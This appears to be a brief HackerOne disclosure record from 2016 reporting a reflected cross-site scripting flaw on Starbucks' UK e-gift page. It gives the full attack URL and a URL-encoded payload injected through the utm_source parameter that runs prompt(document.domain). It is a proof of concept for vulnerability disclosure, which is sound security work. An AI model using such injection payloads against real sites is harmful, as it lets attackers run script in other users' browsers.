Starbucks: www.starbucks.co.uk Reflected XSS via utm_source parameter

2016-05-24T02:11:53
ID: H1:140616
Type: hackerone
Reporter: meals
Modified: 2016-12-19T22:48:31

Description

https://www.starbucks.co.uk/shop/card/egift?utm_campaign=egift&utm_content=WinterFY16&utm_medium=GPH&utm_source=SBUXcouk"%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e

Payload: "%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e